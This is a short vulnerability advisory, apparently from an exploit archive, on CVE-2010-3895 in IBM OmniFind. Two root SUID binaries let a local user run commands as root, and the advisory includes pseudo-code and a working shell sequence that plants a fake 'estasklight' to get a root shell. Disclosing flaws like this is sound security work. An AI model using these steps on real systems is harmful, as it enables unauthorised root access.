IBM OmniFind Privilege Escalation Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IBM OmniFind Privilege Escalation Vulnerability
# Published : 2010-11-09
# Author : Fatih Kilic
# Previous Title : Free CD to MP3 Converter 3.1 Buffer Overflow Exploit
# Next Title : Mp3-Nator 2.0 Buffer Overflow Exploit (SEH)

* Privilege escalation in two applications (CVE-2010-3895)

Root SUID bits are set for the applications ?esRunCommand? and ?estaskwrapper?.

-------------------------------------------------------------------------
  -rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
  -rwsr-xr-x 1 root users ... /opt/IBM/es/bin/estaskwrapper
-------------------------------------------------------------------------


?esRunCommand? takes one argument and runs it as root. See example below.
-------------------------------------------------------------------------
  -rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
  
  joemueller@XXX:/opt/IBM/es/bin> ./esRunCommand id
  OUTPUT: cmd is id
  id
  uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
-------------------------------------------------------------------------



The application ?estaskwrapper? is meant to start the application ?estasklight?. 
The pseudo c code looks like this:
-------------------------------------------------------------------------
	main() {
	  int auth = 0;
	  ...
	  if (argv[1] == "estasklight") {
	    auth = 1;
		  ...
		  path = getenv("ES_LIBRARY_PATH");
		  if (path) {
		    setenv("LD_LIBRARY_PATH", path);
		    setenv("LIBPATH", path);
		    ...
		    if (auth) {
		  	  execvp ("estasklight", args);
		    }
		    ...
		  }
	    ...
	  }
	...
	}
-------------------------------------------------------------------------


Explanation of the code:

?argv[1]? is the first command line argument, that is compared with the string
?estasklight?. If it is equal the ?auth? flag is set. 
If the user has the environment variable ?ES_LIBRARY_PATH? set, the value is
copied to two new environment variables ?LD_LIBRARY_PATH? and ?LIBPATH?.
If the ?auth? flag is set, the application ?estasklight? is executed.



Exploit for running /bin/sh
-------------------------------------------------------------------------
joemueller@XXX:~> cp /bin/sh ~/bin/estasklight
joemueller@XXX:~> export ES_LIBRARY_PATH=/home/joemueller
joemueller@XXX:~> export PATH=/home/joemueller/bin:$PATH
joemueller@XXX:~> /opt/IBM/es/bin/estaskwrapper estasklight
XXX:~# id
uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
-------------------------------------------------------------------------